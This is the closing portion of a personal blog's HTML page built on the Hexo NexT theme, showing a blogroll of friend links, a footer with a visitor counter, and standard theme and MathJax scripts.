          <a href="http://blog.x3zvawq.xyz" title="http://blog.x3zvawq.xyz" rel="noopener" target="_blank">X3ZvaWQ</a>
        </li>
      
        <li class="links-of-blogroll-item">
          <a href="https://chenks12138.github.io" title="https://chenks12138.github.io" rel="noopener" target="_blank">ChengKS</a>
        </li>
      
        <li class="links-of-blogroll-item">
          <a href="https://zaiyewujiang.cn" title="https://zaiyewujiang.cn" rel="noopener" target="_blank">TinyHuang</a>
        </li>
      
        <li class="links-of-blogroll-item">
          <a href="http://yiling.xyz/" title="http://yiling.xyz/" rel="noopener" target="_blank">ZeroHuang</a>
        </li>
      
        <li class="links-of-blogroll-item">
          <a href="https://www.ancode.club/" title="https://www.ancode.club/" rel="noopener" target="_blank">ancode</a>
        </li>
      
        <li class="links-of-blogroll-item">
          <a href="http://www.zyhcoding.club/" title="http://www.zyhcoding.club/" rel="noopener" target="_blank">zyh</a>
        </li>
      
    </ul>
  </div>

      </div>
        <div class="back-to-top motion-element">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>
      

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

<div class="copyright">
  &copy; 2019 – 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Yiayaz</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    <span title="Symbols count total">93k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="Reading time total">1:25</span>
</div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="Total Visitors">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
  
    <span class="post-meta-divider">|</span>
  
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="Total Views">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
  
</div>












        
      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js?v=3.1.0"></script>
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
<script src="/js/utils.js?v=7.4.1"></script><script src="/js/motion.js?v=7.4.1"></script>
<script src="/js/schemes/pisces.js?v=7.4.1"></script>
<script src="/js/next-boot.js?v=7.4.1"></script>



  








  <script src="/js/local-search.js?v=7.4.1"></script>














  

  
    
      
<script type="text/x-mathjax-config">

  MathJax.Hub.Config({
    tex2jax: {
      inlineMath: [ ['$', '$'], ['\\(', '\\)'] ],
      processEscapes: true,
      skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
    },
    TeX: {
      equationNumbers: {
        autoNumber: 'AMS'
      }
    }
  });

  MathJax.Hub.Register.StartupHook('TeX Jax Ready', function() {
    MathJax.InputJax.TeX.prefilterHooks.Add(function(data) {
      if (data.display) {
        var next = data.script.nextSibling;
        while (next && next.nodeName.toLowerCase() === '#text') {
          next = next.nextSibling;
        }
        if (next && next.nodeName.toLowerCase() === 'br') {
          next.parentNode.removeChild(next);
        }
      }
    });
  });

  MathJax.Hub.Queue(function() {
    var all = MathJax.Hub.getAllJax(), i;
    for (i = 0; i < all.length; i += 1) {
      element = document.getElementById(all[i].inputID + '-Frame').parentNode;
      if (element.nodeName.toLowerCase() == 'li') {
        element = element.parentNode;
      }
      element.classList.add('has-jax');
    }
  });
</script>
<script>
  NexT.utils.getScript('//cdn.jsdelivr.net/npm/mathjax@2/MathJax.js?config=TeX-AMS-MML_HTMLorMML', () => {
    MathJax.Hub.Typeset();
  }, window.MathJax);
</script>

    
  

  

  

</body>
</html>
